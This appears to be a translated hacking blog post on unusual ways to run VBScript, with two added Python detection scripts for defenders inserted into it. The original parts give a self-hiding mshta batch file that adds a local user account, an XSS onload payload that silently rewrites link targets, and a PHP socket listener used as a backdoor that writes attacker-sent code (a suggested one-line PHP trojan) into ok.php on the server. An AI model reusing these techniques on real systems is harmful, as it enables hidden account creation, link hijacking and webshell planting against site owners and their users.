Unconventional ways to run VBS (written by lcx)

Source: Internet
Author: User
Tags: connect, socket, echo command, sapi, set socket, sleep
The SAPI.SpVoice component is available by default on XP and 2003; once you call it, the computer speaks with the voice of an old foreign man. Take code like this: CreateObject("SAPI.SpVoice").Speak "I Love You". Save it with a .vbs suffix, double-click it, and you will hear "I love you" in English. But that raised another question: how do you run VBS code without saving it with a .vbs or .vbe suffix?

I. Using Mshta to run VBS
An HTA file also runs with system permissions once it is launched, and its host process is mshta.exe. Run this line under CMD: mshta vbscript:createobject("Sapi.spvoice").Speak("I love You.")(window.close), and you will hear the same pronunciation. This line is equivalent to temporarily generating an HTA file, running the VBS code inside it, and then calling window.close to close the running window; the HTA window is never visible during the whole operation. What uses can you think of for this way of running? I thought of at least two. The first is a batch file that runs itself hidden, with the basic code as follows:

@echo off
if "%1"=="h" goto begin
mshta vbscript:createobject("Wscript.Shell").Run("%~nx0 h",0)(window.close)&&exit
:begin
REM write your code below this line
net user lcx 12345 /add

This code can only be run by double-clicking, and while it runs you cannot see the batch process's window. The second use I thought of is in injection. There is a very popular article on the internet, roughly titled "solving the multiple-echo problem caused by the number of parameters in MSSQL injection"; its central idea is to write a VBS file onto the injected host (the "broiler") line by line with the echo command, and then call that VBS to download a file. If you execute through mshta instead, download and execute take only one call. The difficulty with putting the VBS code directly after mshta on the command line is the spaces, but this is easily solved by enclosing the VBS code in parentheses. Readers can try it themselves; believe me, it is not hard.
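A defender's view of the mshta tricks above, as an added example that is not part of the original post: it scans constructed process-creation events (Sysmon-style Image/CommandLine fields, an assumption) for mshta.exe launched with an inline vbscript:/javascript: payload, a Wscript.Shell object, a hidden Run(...,0) and a trailing window.close, while a normal .hta launch is left alone.

```python
import re
from typing import Dict, List

# Indicators drawn from the mshta one-liners above: an inline vbscript:/javascript:
# URL instead of an .hta file, a Wscript.Shell object, a Run(...,0) hidden window,
# and the trailing window.close used to hide the HTA window.
INLINE_PROTOCOL = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
SHELL_OBJECT = re.compile(r"wscript\.shell", re.IGNORECASE)
HIDDEN_RUN = re.compile(r"\.run\s*\(.*?,\s*0\s*\)", re.IGNORECASE)
CLOSE_WINDOW = re.compile(r"window\.close", re.IGNORECASE)

# Constructed sample of process-creation events (Sysmon Event ID 1 style fields, assumed).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mshta vbscript:createobject("Sapi.spvoice").Speak("I love You.")(window.close)'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mshta vbscript:createobject("Wscript.Shell").Run("x.bat h",0)(window.close)'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Tools\setup.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def analyse_event(event: Dict[str, str]) -> List[str]:
    """Return the indicator names found in one mshta.exe process-creation event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return []
    cmd = event.get("CommandLine", "")
    checks = [
        ("inline-script-protocol", INLINE_PROTOCOL),
        ("wscript-shell-object", SHELL_OBJECT),
        ("hidden-window-run", HIDDEN_RUN),
        ("self-closing-window", CLOSE_WINDOW),
    ]
    return [name for name, pattern in checks if pattern.search(cmd)]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only events with at least one indicator; a plain .hta launch yields none."""
    findings = []
    for event in events:
        indicators = analyse_event(event)
        if indicators:
            findings.append({"command": event["CommandLine"],
                             "parent": event.get("ParentImage", ""),
                             "indicators": indicators})
    return findings
```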

II. Using the IE address bar to run VBS
Many people use the IE address bar to run JS; VBS works the same way. Open any website and type in the address bar: vbscript:msgbox(document.links.length). After pressing Enter you will see how many links the current page has. Replace it with document.links(i).href, where i is a natural number such as 0, 1, 2, 3 and so on, and each value shows a different link address. This part is really about DHTML. Let's look at the simplest example code:

<a href=http://www.sohu.com>www.sohu.com</a>
<a href=http://www.baidu.com>www.baidu.com</a>

These are two links; save them as a web page and clicking each one jumps to a different page. If this page has a cross-site scripting flaw and I want to tamper with it, can I make a user who clicks www.sohu.com end up at a page I specify? It only takes one added line: <body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>. Now a user who clicks Sohu actually goes to Google, and the original layout of the page is not disturbed. Other DHTML elements work the same way, such as document.links(i).href, document.images(i).src and document.forms(i).action; changing dynamic elements through a cross-site flaw is fun.
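An added check for the link-rewriting trick above (not code from the original post): it parses the served markup for inline handlers that touch document.links/images/forms and, when run over the DOM as it looks after load, reports anchors whose visible hostname disagrees with where the href actually points. The sample markup is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)  # link text that looks like a host
DOM_REWRITE = re.compile(r"document\.(links|images|forms)\s*[\(\[]", re.IGNORECASE)  # onload-style DHTML rewrite

class LinkAuditor(HTMLParser):
    """Collect (href, visible text) per anchor, plus inline handlers that touch DHTML collections."""
    def __init__(self):
        super().__init__()
        self.links, self.handlers, self._href, self._text = [], [], None, []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on") and value and DOM_REWRITE.search(value):
                self.handlers.append((tag, name, value))
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def canonical_host(host):
    """Lower-case and drop a leading 'www.' so www.sohu.com and sohu.com compare equal."""
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host

def audit(html):
    """Return (mismatched links, suspicious handlers); both lists are empty for a clean page."""
    parser = LinkAuditor()
    parser.feed(html)
    parser.close()
    mismatched = [(text, urlparse(href).hostname or "") for href, text in parser.links
                  if HOSTNAME.match(text)
                  and canonical_host(text) != canonical_host(urlparse(href).hostname)]
    return mismatched, parser.handlers

# Constructed samples: the markup as served, and the DOM as it looks after the onload handler ran.
STATIC_MARKUP = """<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
<a href=http://www.sohu.com>www.sohu.com</a>
<a href=http://www.baidu.com>www.baidu.com</a></body>"""
POST_LOAD_DOM = """<a href="http://www.google.com">www.sohu.com</a>
<a href="http://www.baidu.com">www.baidu.com</a>"""
```

Static markup only reveals the handler; the text/href mismatch shows up once the audit runs over the post-load DOM (for example, document.documentElement.outerHTML serialized from the browser).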

III. Calling external components to run VBS
VBS itself is limited in functionality, but it interacts very well with the outside world. If you want to use VBS to simulate nc sending packets, you have to call a VB component. ZZZEVAZZZ explained clearly how VBS can successfully call MSWINSOCK.WINSOCK: download Winsock.ocx and register it, then import the .reg file containing the VB6 control's license key into the registry. Both files can be downloaded from http://zzzevazzz.bokee.com/inc/vb6controls.rar. Recently I spent some time learning PHP and saw a PHP listener online that can be used as a backdoor; the server-side s.php code is as follows:

<?php
// Set some basic variables
$host = "192.168.8.100";
$port = 12345;
// Set the timeout
set_time_limit(0);
// Create a socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create socket\n");
// Bind the socket to the port
$result = socket_bind($socket, $host, $port) or die("Could not bind to socket\n");
// Start listening for connections
$result = socket_listen($socket, 3) or die("Could not set up socket listener\n");
// Accept incoming connections
// Another socket to handle traffic
$spawn = socket_accept($socket) or die("Could not accept incoming connection\n");
// Get input from the client
$input = socket_read($spawn, 1024) or die("Could not read input\n");
// Trim the input string
$input = trim($input); // Write the input to ok.php; this line is my addition.
fputs(fopen('ok.php', 'a+'), "$input");

// Process client input and return results
$output = strrev($input) . "\n";
socket_write($spawn, $output, strlen($output)) or die("Could not write output\n");
// Close sockets
socket_close($spawn);
socket_close($socket);
?>

When IE opens this PHP page, the server running it listens on port 12345. If we use VBS to send packets to port 12345, ok.php is generated in the same directory as the PHP file, and the content of the packet is the code we want written into ok.php. The VBS file c.vbs has the following code:

Set ie = WScript.CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http://192.168.8.100/s.php"   ' s.php is the server side
While ie.Busy
    WScript.Sleep 100
Wend

Do
    WScript.Sleep 200
Loop Until ie.ReadyState = 4

Set socket = WScript.CreateObject("MSWinsock.Winsock")
socket.Protocol = 0
socket.RemotePort = "12345"                ' port
socket.RemoteHost = "192.168.8.100"        ' host
socket.Connect socket.RemoteHost, socket.RemotePort   ' connect
WScript.Sleep 10
ddd = "<?php phpinfo(); ?>" & Chr(13)      ' here you can change this to a one-line PHP trojan
socket.SendData ddd
WScript.Sleep 100
WScript.Echo "OK"
' socket.SendData Chr(13)
socket.Close

Set ie = Nothing

VBS and PHP make a perfect pair, creating a very unconventional backdoor. Of course the value of this backdoor is small, but what matters is the idea, isn't it?
